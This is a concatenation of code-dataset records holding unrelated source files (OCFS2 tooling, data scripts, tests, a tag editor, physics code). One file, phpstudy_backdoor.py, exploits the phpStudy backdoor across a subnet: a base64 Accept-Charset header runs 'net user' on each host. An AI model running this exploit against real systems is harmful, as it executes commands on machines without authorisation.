app.run(debug=True,port=8443)\n","sub_path":"venv/include/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"338564808","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nimport datetime\nimport time\nimport pdb\nimport os\nimport sys\nimport signal\nimport socket\nimport platform\nfrom o2locktoplib import config\nfrom o2locktoplib import shell\n\nPY2 = (sys.version_info[0] == 2)\nif \"linux\" in platform.system().lower():\n    LINUX = True\nelse:\n    LINUX = False\n\ndef get_remote_path(ip):\n    prefix = \"ssh root@{0} \".format(ip)\n    cmd = \"echo '$PATH'\"\n    sh = shell.shell(prefix + cmd)\n    ret = sh.output()\n    return ret\n\ndef get_remote_cmd_list(ip):\n    path = get_remote_path(ip)\n    prefix = \"ssh root@{0} \".format(ip)\n    ret = []\n    #cmd = 'for i in `echo $PATH|sed \"s/:/ /g\"`; do ls $i | grep -v \"^d\"; done'\n    if len(path) == 0:\n        return []\n    for i in path[0].split(':'):\n        cmd = 'ls {0}'.format(i)\n        sh = shell.shell(prefix + cmd)\n        ret = ret + sh.output()\n    return ret\n\ndef cmd_is_exist(cmd_list, ip=None):\n    assert isinstance(cmd_list, list)\n    if not ip:\n        cmds = []\n        cmdpaths = os.environ['PATH'].split(':')\n        for cmdpath in cmdpaths:\n            if os.path.isdir(cmdpath):\n                cmds += os.listdir(cmdpath)\n    else:\n        cmds = get_remote_cmd_list(ip)\n    for cmd in cmd_list:\n        if cmd not in cmds:\n            return False, cmd\n    return True, None\n\ndef get_hostname():\n    return socket.gethostname()\n\ndef now():\n    return datetime.datetime.now()\n\ndef sleep(interval):\n    return time.sleep(interval)\n\ndef uname_r(ip=None):\n    prefix = \"ssh root@{0} \".format(ip) if ip else \"\"\n    cmd = \"uname -r\"\n    sh = shell.shell(prefix + cmd)\n    ret = sh.output()\n    return ret\n\ndef is_kernel_ocfs2_fs_stats_enabled(ip=None):\n    uname = uname_r(ip)\n    prefix = \"ssh root@{0} \".format(ip) if ip else \"\"\n    cmd = \"grep \\\"CONFIG_OCFS2_FS_STATS=y\\\" /boot/config-{uname}\".format(\n        uname=\" \".join(uname))\n    sh = shell.shell(prefix + cmd)\n    ret = sh.output()\n    if len(ret) == 0:\n        return False\n    if ret[0] == 
\"CONFIG_OCFS2_FS_STATS=y\":\n return True\n return False\n\ndef prompt_sshkey_copy_id(ip=None):\n answer = input(\"Did you run ssh-copy-id to the remote node?[Y/n]\")\n return answer in ['Y', 'y']\n\n\ndef get_one_cat(lockspace, ip=None):\n prefix = \"ssh root@{0} \".format(ip) if ip else \"\"\n cmd = \"cat /sys/kernel/debug/ocfs2/{lockspace}/locking_state\".format(\n lockspace=lockspace)\n sh = shell.shell(prefix + cmd)\n ret = sh.output()\n if len(ret) == 0:\n eprint(\"{cmd} on {ip} return len=0\".format(cmd=cmd, ip=ip))\n return ret\n\n# fs_stat\n\"\"\"\n Device => Id: 253,16 Uuid: 7635D31F539A483C8E2F4CC606D5D628 Gen: 0x6434F530 Label:\n Volume => State: 2 Flags: 0x0\n Sizes => Block: 4096 Cluster: 4096\n Features => Compat: 0x3 Incompat: 0xB7D0 ROcompat: 0x1\n Mount => Opts: 0x104 AtimeQuanta: 60\n Cluster => Stack: pcmk Name: 7635D31F539A483C8E2F4CC606D5D628 Version: 1.0\n DownCnvt => Pid: 3802 Count: 0 WakeSeq: 707 WorkSeq: 707\n Recovery => Pid: -1 Nodes: None\n Commit => Pid: 3810 Interval: 0\n Journal => State: 1 TxnId: 2 NumTxns: 0\n Stats => GlobalAllocs: 0 LocalAllocs: 0 SubAllocs: 0 LAWinMoves: 0 SAExtends: 0\nLocalAlloc => State: 1 Descriptor: 0 Size: 27136 bits Default: 27136 bits\n Steal => InodeSlot: -1 StolenInodes: 0, MetaSlot: -1 StolenMeta: 0\nOrphanScan => Local: 117 Global: 248 Last Scan: 5 seconds ago\n Slots => Num RecoGen\n * 0 1\n 1 0\n 2 0\n 3 0\n 4 0\n 5 0\n 6 0\n 7 0\n\"\"\"\ndef major_minor_to_device_path(major, minor, ip=None):\n prefix = \"ssh root@{0} \".format(ip) if ip else \"\"\n cmd = \"lsblk -o MAJ:MIN,KNAME,MOUNTPOINT -l | grep '{major}:{minor}'\"\\\n .format( major=major,minor=minor)\n output = shell.shell(prefix + cmd)\n #output should be like\n \"\"\"\n MAJ:MIN KNAME\n 253:0 vda\n 253:1 vda1\n 253:2 vda2\n 253:16 vdb\n \"\"\"\n assert(len(output) > 0)\n device_name = output[0].split()[1]\n return device_name\n\ndef eprint(msg):\n print(msg, file=sys.stdout)\n # print(msg, file=sys.stderr)\n\ndef lockspace_to_device(uuid, ip=None):\n cmd = \"cat /sys/kernel/debug/ocfs2/{uuid}/fs_state | grep 'Device =>'\"\\\n .format(uuid=uuid)\n prefix = \"ssh root@{0} \".format(ip) if ip else \"\"\n sh = shell.shell(prefix + cmd)\n output = sh.output()\n if len(output) == 0:\n err_msg = \"\\n\\nError while detecting the mount point {uuid} on {ip}\\n\\n\".format(\n uuid=uuid, ip=ip)\n eprint(err_msg)\n return\n #output should be like\n \"\"\"\n Device => Id: 253,16 Uuid: 7635D31F539A483C8E2F4CC606D5D628 Gen: 0x6434F530 Label:\n \"\"\"\n dev_major, dev_minor = output[0].split()[3].split(\",\")\n # the space must be required\n cmd = \"lsblk -o MAJ:MIN,KNAME,MOUNTPOINT -l | grep '{major}:{minor} '\" \\\n .format(major=dev_major,minor=dev_minor)\n sh = shell.shell(prefix + cmd)\n #before grep output should be like\n \"\"\"\n MAJ:MIN KNAME MOUNTPOINT\n 253:0 vda\n 253:1 vda1 [SWAP]\n 253:2 vda2 /\n 253:16 vdb /mnt/ocfs2-1\n \"\"\"\n #after grep\n \"\"\"\n 253:16 vdb /mnt/ocfs2-1\n \"\"\"\n output = sh.output()\n assert(len(output) > 0)\n device_name, mount_point = output[0].split()[1:]\n return dev_major, dev_minor, mount_point\n #device_name = major_minor_to_device_path(dev_major, dev_minor)\n #return device_name\n\ndef get_dlm_lockspaces(ip=None):\n prefix = \"ssh root@{0} \".format(ip) if ip else \"\"\n cmd = \"dlm_tool ls | grep ^name\"\n sh = shell.shell(prefix + cmd)\n output = sh.output()\n lockspace_list = [i.split()[1] for i in output]\n if len(lockspace_list):\n return lockspace_list\n return None\n\ndef get_dlm_lockspace_mp(ip, mount_point):\n prefix = 
\"ssh root@{0} \".format(ip) if ip else \"\"\n cmd = \"o2info --volinfo {0} | grep UUID\".format(mount_point)\n sh = shell.shell(prefix + cmd)\n output = sh.output()\n if (len(output) == 1):\n if config.UUID == None or config.UUID == \"\":\n config.UUID = output[0].split()[1]\n return output[0].split()[1]\n return None\n\ndef _trans_uuid(uuid):\n if not uuid:\n return None\n uuid = uuid.lower()\n return \"{0}-{1}-{2}-{3}-{4}\".format(uuid[:8],uuid[8:12],uuid[12:16],uuid[16:20],uuid[20:])\n\ndef get_dlm_lockspace_max_sys_inode_number(ip, mount_point):\n uuid = _trans_uuid(get_dlm_lockspace_mp(ip, mount_point))\n if not uuid:\n eprint(\"o2locktop: error: can't find the mount point: {0}, please cheach and retry\".format(mount_point))\n prefix = \"ssh root@{0} \".format(ip) if ip else \"\"\n cmd = \"blkid | grep {0}\".format(uuid)\n output = shell.shell(prefix + cmd).output()\n \n if (len(output) == 1):\n filesystem = output[0].split()[0].strip()[:-1]\n if filesystem[-1] == '/':\n filesystem = filesystem[:-1] \n else:\n return None\n # TODO:fix shell\n prefix = \"ssh root@{0} \".format(ip) if ip else \"\"\n cmd = \"debugfs.ocfs2 -R \\\"ls //\\\" {0}\".format(filesystem)\n output = shell.shell(prefix + cmd).output()\n if len(output) > 0:\n return int(output[-1].split()[0])\n return None\n\n\"\"\"\nlchen-vanilla-node1:~/code # mount | grep \"type ocfs2\" | cut -f1\n/dev/vdb on /mnt/ocfs2 type ocfs2 (rw,relatime,heartbeat=none,nointr,data=ordered,errors=remount-ro,atime_quantum=60,cluster_stack=pcmk,coherency=full,user_xattr,acl)\n/dev/vdb on /mnt/ocfs2-1 type ocfs2 (rw,relatime,heartbeat=none,nointr,data=ordered,errors=remount-ro,atime_quantum=60,cluster_stack=pcmk,coherency=full,user_xattr,acl)\n\"\"\"\ndef device_to_mount_points(device, ip=None):\n prefix = \"ssh root@{0} \".format(ip) if ip else \"\"\n cmd = \"mount | grep 'type ocfs2'\"\n sh = shell.shell(prefix + cmd)\n output = sh.output()\n dev_stat = os.stat(device)\n dev_num = dev_stat.st_rdev\n\n ret = []\n for i in output:\n i = i.split()\n _dev = i[0]\n if os.stat(_dev).st_rdev == dev_num:\n ret.append(i[2])\n return list(set(ret))\n\ndef clear_screen():\n os.system(\"clear\")\n\n\n\ndef kill():\n os.killpg(os.getpgid(0), signal.SIGKILL)\n","sub_path":"o2locktoplib/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":8324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"355713505","text":"from openpyxl import load_workbook\n\n\nclass excelop:\n def excelread(self):\n listchecklist = []\n workbook = load_workbook(r\"../config/case.xlsx\")\n sheets = workbook[\"Sheet1\"]\n rows_sheet = sheets.iter_rows() # 读取每一行\n\n for item in rows_sheet:\n if item[0].value == \"url\":\n continue\n listes = []\n for col in item:\n listes.append(col.value)\n\n listchecklist.append(listes)\n\n return listchecklist","sub_path":"excel/excelop.py","file_name":"excelop.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"619695366","text":"# script to make a spatial polygon plot from a shapefile and data\n# to run, need python 2.7\n# on cheyenne, type: module load python/2.7.16; ncar_pylib\n\n# set up modules\nimport sys\nimport numpy as np\n\nsys.path.append('/glade/u/home/andywood/proj/jtti/scripts/analysis/utils/')\nsys.path.append('/glade/work/eriddle/python_eriddle/lib/python2.7/site-packages/')\nimport plotting_utils\nimport Nio\nimport pdb\n\n# variable to plot\nplot_var = 
'airtemp_mean'\ndata_tstep = 0 # timestep number to extract from data file\n\n# filenames\ndata_file = '~/proj/SHARP/wreg/cali_huc12/output/3hr/cali_huc12.3hr.merged.nc'\nshp_file = '/glade/u/home/andywood/proj/SHARP/wreg/WORK/gis/shapes/cali_huc12/CALI_huc12_v5.shp'\nplot_file = './'+plot_var+'.png'\n\n\n# open data file\nf = Nio.open_file(data_file)\n\n# order number of attribute in shapefile that matches poly to data index ('datacid')\njoinid_index = 20 # starting at 0 for first attribute\n\n# read data\ndatacid = f.variables['hruId'][:] # id in the data file that matches the shapes\ndata = f.variables[plot_var][data_tstep,:] # get timestep 0 for all hrus. [time,hru]\n\n\n# plot data (call function from ./utils/ dir)\nplotting_utils.catchment_plot(data, datacid, shp_file, joinid_index, plot_file)\n\nsys.exit(0)\n","sub_path":"analysis/plot_catchment/plot_catchments.simple.py","file_name":"plot_catchments.simple.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"513592192","text":"# -*- coding: utf-8 -*-\nimport pytest\nfrom nose.plugins.attrib import attr\nfrom ..base_wbs_api import WBSAPIBaseTestMixin\nimport unittest\nfrom fake_data import FakeData\nimport sys\nimport types\nimport os\nfrom API import config\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\n\n@attr('internal')\n@attr('externalopen')\nclass InvestorProductDetailsTest(WBSAPIBaseTestMixin, unittest.TestCase):\n phone = FakeData().phone_number()\n\n expected_response_format = {\n \"success\": bool,\n \"msg\": unicode,\n \"errorCode\": types.NoneType,\n \"data\": {\n \"id\": int,\n \"name\": unicode,\n \"property\": int,\n \"source\": int,\n \"categoryProperty\": int,\n \"categoryId\": int,\n \"categoryName\": unicode,\n \"minAmount\": float,\n \"currencyUnit\": unicode,\n \"term\": unicode,\n \"annualReturn\": unicode,\n \"introduction\": unicode,\n \"productReview\": unicode,\n \"productLight\": unicode,\n \"netValue\": unicode,\n \"statusStr\": unicode,\n \"status\": int,\n \"releaseStatus\": int,\n \"seq\": int,\n \"currency\": int,\n \"currencyStr\": unicode,\n \"smallPic\": unicode,\n \"bigPic\": unicode,\n \"productMarketingCopy\": unicode,\n \"riskInformation\": unicode,\n \"accountName\": unicode,\n \"bankName\": unicode,\n \"accountNo\": unicode,\n \"memo\": unicode,\n \"riskLevel\": int,\n \"riskValue\": int,\n \"riskName\": unicode,\n \"riskLevelName\": unicode,\n \"outId\": int,\n \"videos\": [\n {\n \"fileUrl\":unicode,\n \"fileName\":unicode,\n \"snapFile\":unicode,\n \"fileType\":unicode\n }\n ],\n \"pdfs\": list,\n \"announcements\": unicode\n }\n }\n\n @classmethod\n def setUpClass(cls):\n # 查询产品分类列表\n cls.view_url = 'categoryGroupList.json'\n token = cls.generate_investor_token()\n data_dict = {\n \"token\": token,\n \"param\": {}\n }\n cls.data = 'data={0}'.format(cls.dict_to_json(data_dict))\n super(InvestorProductDetailsTest, cls).setUpClass()\n #此处拿到的categoryId,调用selectByCategory接口得到的产品有可能为空,也就会出现数组越界错误,目前咱们没有接口能通过categoryproperty来取产品\n categoryId = cls.response['data']['data'][0][-2]['id']\n # 根据产品分类查询产品列表\n cls.view_url = config.select_by_category[os.getenv('api_type', None)]\n data_dict = {\n \"token\": token,\n \"param\": {\n \"categoryId\": categoryId\n }\n }\n cls.data = 'data={0}'.format(cls.dict_to_json(data_dict))\n cls.response = cls.do_request(cls.data)\n value = cls.response['data']['data'][0]['id']\n # 查询产品详情\n cls.view_url = 'productDetail.json'\n data_dict = {\n \"token\": token,\n 
\"param\": {\n \"value\": value\n }\n }\n cls.data = 'data={0}'.format(cls.dict_to_json(data_dict))\n super(InvestorProductDetailsTest, cls).setUpClass()\n","sub_path":"automation-testing/API/wbs/investor/tests_productDetail.py","file_name":"tests_productDetail.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"614145890","text":"# -*-coding:utf-8 -*-\n\nimport threading\nimport requests\nimport base64\nimport ipaddress\nimport sys\nimport queue\n\nThreadNumber = 100\nTIME_OUT = 5\ntaskQueuehandle = queue.Queue()\nhttp_headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n \"Accept-Language\": \"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\",\n \"Connection\": \"close\",\n \"Accept-Encoding\": \"gzip,deflate\",\n \"Accept-Charset\": \"ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7\",\n \"Upgrade-Insecure-Requests\": \"1\",\n}\nf = open(\"url.txt\",\"a+\")\n\nclass Check(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n\n def run(self):\n global taskQueuehandle,http_headers\n while 1:\n try:\n url = taskQueuehandle.get(timeout=0.5)\n result = requests.get(url,headers = http_headers,timeout = TIME_OUT)\n self.callback(result,url)\n except queue.Empty:\n # stopFlag = False\n break\n except requests.exceptions.RequestException:\n print(f'{url} requests error')\n continue\n\n def callback(self,res,url):\n if (\"Administrator\" in res.text) or (\"DefaultAccount\" in res.text) or (\"Guest\" in res.text):\n f.write(url)\n f.write(\"\\n\")\n f.flush()\n print(f'{url} have a backdoor')\n else:\n print(f'{url}')\n\ndef main():\n global taskQueuehandle\n ips = ipaddress.ip_network(\"192.168.220.0/24\")\n for ip in ips.hosts():\n ip_to_url = (\"http://\" + str(ip)).rstrip()\n taskQueuehandle.put(ip_to_url)\n threadlist = []\n for i in range(ThreadNumber):\n work = Check()\n threadlist.append(work)\n for t in range(ThreadNumber):\n threadlist[t].start()\n for t in range(ThreadNumber):\n threadlist[t].join()\n\n\nif __name__ == '__main__':\n main()\n f.close()\n","sub_path":"phpstudy_backdoor.py","file_name":"phpstudy_backdoor.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"227968","text":"#!/usr/bin/python3\n\"\"\" Contains the Base class. \"\"\"\nimport json\n\n\nclass Base():\n \"\"\" I'm the base for everything! \"\"\"\n __nd_objects = 0\n\n def __init__(self, id=None):\n \"\"\" Initializes the attributes. \"\"\"\n if id is not None:\n self.id = id\n else:\n Base.__nd_objects += 1\n self.id = Base.__nd_objects\n\n @staticmethod\n def to_json_string(list_dictionaries):\n \"\"\" Returns the JSON string representation of list_dictionaries. \"\"\"\n if list_dictionaries is None:\n return \"[]\"\n return json.dumps(list_dictionaries)\n\n @classmethod\n def save_to_file(cls, list_objs):\n \"\"\" Writes the JSON string representation of list_bjs to a file. \"\"\"\n if list_objs and len(list_objs) > 0:\n objs = list_objs.copy()\n for i in range(len(objs)):\n objs[i] = objs[i].to_dictionary()\n else:\n objs = []\n with open(\"{}.json\".format(cls.__name__), 'w') as f:\n f.write(cls.to_json_string(objs))\n\n @staticmethod\n def from_json_string(json_string):\n \"\"\" Returns the list of the JSON string representation. 
\"\"\"\n        if not json_string or len(json_string) < 1:\n            return []\n        return json.loads(json_string)\n\n    @classmethod\n    def create(cls, **dictionary):\n        \"\"\" Returns an instance with all attributes already set. \"\"\"\n        if cls.__name__ == \"Square\":\n            new = cls(1)\n        else:\n            new = cls(1, 1)\n        new.update(**dictionary)\n        return new\n\n    @classmethod\n    def load_from_file(cls):\n        \"\"\" Returns a list of instances. \"\"\"\n        try:\n            with open(\"{}.json\".format(cls.__name__), 'r') as f:\n                l = cls.from_json_string(f.read())\n                for i in range(len(l)):\n                    l[i] = cls.create(**l[i])\n        except:\n            return []\n        return l\n","sub_path":"0x0C-python-almost_a_circle/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"595870391","text":"import pandas as pd\nimport numpy as np\nfrom copy import deepcopy\nfrom multiprocessing import Pool\n\ndf = pd.read_csv('movie_train.csv')\n# df = pd.read_csv('ms_train.csv')\ndf = df.fillna(0)\ndf = df.set_index('Unnamed: 0', drop = True)\n\n# define s and c matrix, s is the raw score, c is 1 if value exists, 0 else.\ns = deepcopy(df)\nc = df\n\nc[c>0] = 1\n\ndef MSD(i, j):\n    num = 0\n    dem = 0 \n    for n in range(s.shape[1]):\n        num += c.iloc[i, n]*c.iloc[j,n]*(s.iloc[i, n]-s.iloc[j, n])**2\n        dem += c.iloc[i, n]*c.iloc[j,n]\n    return(num/dem)\n\ndef calc_MSD(part):\n    # part is the starting point of the iteration. chunk is the chunk size, so each worker\n    # will work on a chunk size of 50.\n    chunk = 50\n    start = part\n    if ((part + chunk) > s.shape[0]):\n        finish = s.shape[0]\n    else:\n        finish = part+chunk\n    \n    # we create a D matrix for each worker\n    D = [[0 for i in range(s.shape[0])] for i in range(finish-start)] \n    for x, i in enumerate(range(start, finish, 1)):\n        for y, j in enumerate(range(s.shape[0])):\n            D[x][y] = MSD(i, j)\n    return(D)\n\np = Pool(64)\n# a is a list of matrices generated by each worker in the pool\na = p.map(calc_MSD, list(range(0, s.shape[0], 50)))\n\n# flatten our a and put into one big matrix, then write to csv.\noutput = pd.DataFrame([item for sublist in a for item in sublist])\noutput.columns = list(df.index)\noutput.index = list(df.index)\noutput.to_csv('MSDsim_movie.csv')\n# output.to_csv('MSDsim_ms.csv')\n","sub_path":"doc/msd.py","file_name":"msd.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"331429767","text":"#!/usr/bin/env python\nfrom os import listdir, devnull\nimport subprocess\nimport mutagen.id3\nimport mutagen.flac\n\ndef qRun(command):\n    # devnull must be opened for writing so the child's output can be redirected into it\n    with open(devnull, 'w') as redir:\n        subprocess.run(\n            command,\n            stdout = redir,\n            stderr = redir)\n\ndef convert(song):\n    print(\"Converting \"+song+\" to mp3\")\n    newsong = song[:song.rfind(\".\")]+\".mp3\"\n    command = [\n        \"ffmpeg\",\n        \"-i\", song,\n        \"-ab\", \"320k\",\n        newsong\n    ]\n    qRun(command)\n    qRun([\"rm\", song])\n    return newsong\n\nartist = input(\"Artist? \")\nalbum = input(\"Album? \")\nyear = input(\"Year? 
\")\n\nprint(\"\")\nfiles = listdir(\"./\")\nsongs = []\ncover =[]\nfor f in files:\n ext = f[ f.rfind('.')+1 :]\n if ext in [\"mp3\"]:\n songs.append(f)\n elif ext in [\"flac\", \"m4a\"]:\n newf = convert(f)\n songs.append(newf)\n elif \"cover\" in f:\n cover.append(f)\n\nprint(\"\\nUpdating tags:\")\nfor song in songs:\n print(song)\n k = song.find(' ')\n l = song.rfind('.')\n # Find track number and title\n num = song[:k]\n title = song[k+1:l]\n\n # Set tags\n tags = mutagen.id3.ID3()\n tags[\"TALB\"] = mutagen.id3.TALB(text=album)\n tags[\"TDRC\"] = mutagen.id3.TDRC(text=year)\n tags[\"TIT2\"] = mutagen.id3.TIT2(text=title)\n tags[\"TPE1\"] = mutagen.id3.TPE1(text=artist)\n tags[\"TRCK\"] = mutagen.id3.TRCK(text=num)\n if len(cover) == 1:\n tags[\"APIC\"] = mutagen.id3.APIC(\n mime=\"image/jpeg\",\n data=open(cover[0], 'rb').read()\n )\n # Save tags\n tags.save(song)\n\nif len(cover) != 1:\n print(\"\\nProblems with cover\")\n","sub_path":"tagedit.py","file_name":"tagedit.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"571905226","text":"#!/usr/bin/env python\n\n'''\nZemax .zmx file reading utility. Returns a Lens class\n'''\n\n#import lens\n\n# List of starting tokens\nTOKENS = ['VERS',\n 'MODE',\n 'NAME',\n 'NOTE',\n 'PFIL',\n 'UNIT',\n 'ENPD',\n 'ENVD',\n 'GFAC',\n 'GCAT',\n 'RAIM',\n 'PUSH',\n 'SDMA',\n 'FTYP',\n 'ROPD',\n 'PICB',\n 'XFLN',\n 'YFLN',\n 'FWGN',\n 'VDXN',\n 'VDYN',\n 'VCYN',\n 'VANN',\n 'WAVM',\n 'PWAV',\n 'POLS',\n 'GLRS',\n 'GSTD',\n 'NSCD',\n 'COFN',\n 'SURF',\n 'TYPE',\n 'CURV',\n 'HIDE',\n 'MIRR',\n 'SLAB',\n 'DISZ',\n 'DIAM',\n 'POPS',\n 'COMM',\n 'STOP',\n 'COAT',\n 'GLAS',\n 'FLAP',\n 'BLNK',\n 'TOL',\n 'MNUM',\n 'MOFF']\n\ndef read_zmx(filename):\n '''\n Function to read a .zmx file and return a lens class\n\n Inputs:\n filename: Name of file to read\n\n Outputs:\n lens: A Lens class with all configurations in place\n '''\n # Read all lines first\n f = open(filename, 'r')\n\n lines = f.readlines()\n return lines\n\ndef _parse_line(line): \n '''\n Parse a single line and find out tokens and values.\n\n Inputs:\n line: Single line string with tokens separated by spaces\n '''\n # First split\n tokens = line.split(' ')\n\n # Convert any numbers in tokens\n for idx in range(len(tokens)):\n try:\n tokens[idx] = float(tokens[idx])\n except:\n pass\n\n return tokens\n","sub_path":"ray_tracing/zemax.py","file_name":"zemax.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"435474453","text":"import unittest\n\nfrom backend.utils.braacket_connection import Braacket\nfrom backend.utils.psyonix_api_handler import get_bot_by_steam_id, get_rank, get_empty_data\nfrom tests.utils import initialize_db_with_replays, clear_dir\n\n\nclass BraacketTest(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.league = Braacket()\n replays = [\n 'https://cdn.discordapp.com/attachments/493849514680254468/576877585896570920/ALL_STAR.replay',\n 'https://cdn.discordapp.com/attachments/493849514680254468/576877550891171860/ALL_STAR_SCOUT.replay',\n 'https://cdn.discordapp.com/attachments/493849514680254468/560580395276566548/SKYBOT_DRIBBLE_INFO.replay',\n ]\n initialize_db_with_replays(replays);\n\n def test_get_player(self):\n bot = get_bot_by_steam_id(\"b086f2d2abb\")\n self.assertEqual(bot, \"SkyBot\")\n braacket_id = self.league.player_cache.get(bot)\n skybot_id = 
\"54FB8C16-6FA9-4C4A-AAD5-3DB8A6AE169B\"\n self.assertEqual(braacket_id, skybot_id)\n ranking_info = self.league.get_ranking(braacket_id)\n self.assertIsNotNone(ranking_info)\n\n def test_get_non_existing_bot(self):\n self.assertIsNone(get_bot_by_steam_id(\"notABot\"))\n self.assertIsNone(self.league.player_cache.get(\"notABot\"))\n self.assertIsNone(self.league.get_ranking(\"notABot\"))\n self.assertIsNone(get_bot_by_steam_id(\"bNotABotb\"))\n\n def test_get_bot_by_steam_id_allstars(self):\n bot = get_bot_by_steam_id(\"bcfe70a272b\")\n self.assertEqual(bot, \"Allstar\")\n bot = get_bot_by_steam_id(\"b40b\")\n self.assertEqual(bot, \"Allstar\")\n\n def test_get_rank_bot(self):\n unranked_rank = get_empty_data([\"b086f2d2abb\"])\n rank = get_rank(\"b086f2d2abb\")\n self.assertNotEqual(unranked_rank[list(unranked_rank.keys())[0]].get('10'), rank.get('10'))\n self.assertEqual(unranked_rank[list(unranked_rank.keys())[0]].get('13'), rank.get('13'))\n self.assertEqual(unranked_rank[list(unranked_rank.keys())[0]].get('11'), rank.get('11'))\n\n @classmethod\n def tearDownClass(cls) -> None:\n clear_dir()\n","sub_path":"tests/backend_utils_tests/braacket_test.py","file_name":"braacket_test.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"146489548","text":"# This file holds the function definition for the Lorenz system in the\r\n# frequency domain.\r\n\r\nimport numpy as np\r\n\r\n# define parameters\r\nparameters = {'rho': 28, 'beta': 8/3, 'sigma': 10}\r\n\r\ndef response(x, defaults = parameters):\r\n # unpack defaults\r\n rho = defaults['rho']\r\n beta = defaults['beta']\r\n sigma = defaults['sigma']\r\n\r\n # intialise response vector\r\n response = np.zeros(np.shape(x))\r\n\r\n # assign response\r\n response[:, 0] = sigma*(x[:, 1] - x[:, 0])\r\n response[:, 1] = (rho*x[:, 0]) - x[:, 1] - (x[:, 0]*x[:, 2])\r\n response[:, 2] = (x[:, 0]*x[:, 1]) - (beta*x[:, 2])\r\n\r\n return response\r\n\r\ndef jacobian(x, defaults = parameters):\r\n # unpack defaults\r\n rho = defaults['rho']\r\n beta = defaults['beta']\r\n sigma = defaults['sigma']\r\n\r\n # initialise jacobian matrix\r\n jacobian = np.zeros([np.shape(x)[0], np.shape(x)[1], np.shape(x)[1]])\r\n\r\n # compute jacobian elements\r\n jacobian[:, 0, 0] = -sigma\r\n jacobian[:, 0, 1] = sigma\r\n jacobian[:, 1, 0] = rho - x[:, 2]\r\n jacobian[:, 1, 1] = -1\r\n jacobian[:, 1, 2] = -x[:, 0]\r\n jacobian[:, 2, 0] = x[:, 1]\r\n jacobian[:, 2, 1] = x[:, 0]\r\n jacobian[:, 2, 2] = -beta\r\n\r\n return np.squeeze(jacobian)\r\n\r\ndef nl_factor(x, defaults = parameters):\r\n # initialise output vector\r\n nl_vector = np.zeros(np.shape(x))\r\n\r\n # assign values\r\n nl_vector[:, 1] = -x[:, 0]*x[:, 2]\r\n nl_vector[:, 2] = x[:, 0]*x[:, 1]\r\n\r\n return nl_vector\r\n\r\n# def nl_factor2(x, defaults = parameters):\r\n# # initialise output vector\r\n# nl_vector = np.zeros(2)\r\n\r\n# # assign values\r\n# nl_vector[0] = x[0]*x[2]\r\n# nl_vector[1] = x[0]*x[1]\r\n\r\n# return nl_vector\r\n\r\n# def nl_factor_derv(x, defaults = parameters):\r\n# # initialise output matrix\r\n# nl_derv_mat = np.zeros([2, 3])\r\n\r\n# # assign values\r\n# nl_derv_mat[0, 0] = x[2]\r\n# nl_derv_mat[0, 2] = x[0]\r\n# nl_derv_mat[1, 0] = x[1]\r\n# nl_derv_mat[1, 1] = x[0]\r\n\r\n# return 
nl_derv_mat\r\n","sub_path":"ResolventSolver/systems/lorenz.py","file_name":"lorenz.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"36791649","text":"#!/usr/bin/env python3\r\n\r\n'''\r\nWelcome to the Learning Environment for Advanced Python!\r\n If this is your first time here, don't worry, it starts out easy.\r\n To get you started there is a tutorial and help system in place to\r\n introduce you to both the python language and using this environment.\r\n \r\n To see this menu again, run the command \"showhelp()\"\r\n'''\r\n\r\nfrom functools import wraps\r\n\r\nglobal_challenge_list = []\r\nglobal_help_data = []\r\n\r\ndef helper(func):\r\n global_help_data.append(func)\r\n @wraps(func)\r\n def wrap(*args, **kwargs):\r\n return func(*args, **kwargs)\r\n return wrap\r\n\r\ndef challenge(**params):\r\n def wrapper(func):\r\n if not 'name' in params: params['name'] = func.__name__\r\n params['challenge'] = func.__name__\r\n params['module'] = func.__module__\r\n params['example_data'] = func().question()\r\n params['example_answer'] = func().answer(params['example_data'])\r\n @wraps(func)\r\n def wrap(solution):\r\n if not params in __list_challenges__():\r\n print('ERROR! You have not unlocked this challenge yet!\\n')\r\n return False\r\n for i in range(100):\r\n problemcache = func().question()\r\n actualsolution = func().answer(problemcache)\r\n proposedsolution = solution(problemcache)\r\n if not actualsolution == proposedsolution:\r\n print('Solution failed!')\r\n print('Data you were given: {}'.format(repr(problemcache)))\r\n print('Solution expected : {}'.format(repr(actualsolution)))\r\n print('Solution given : 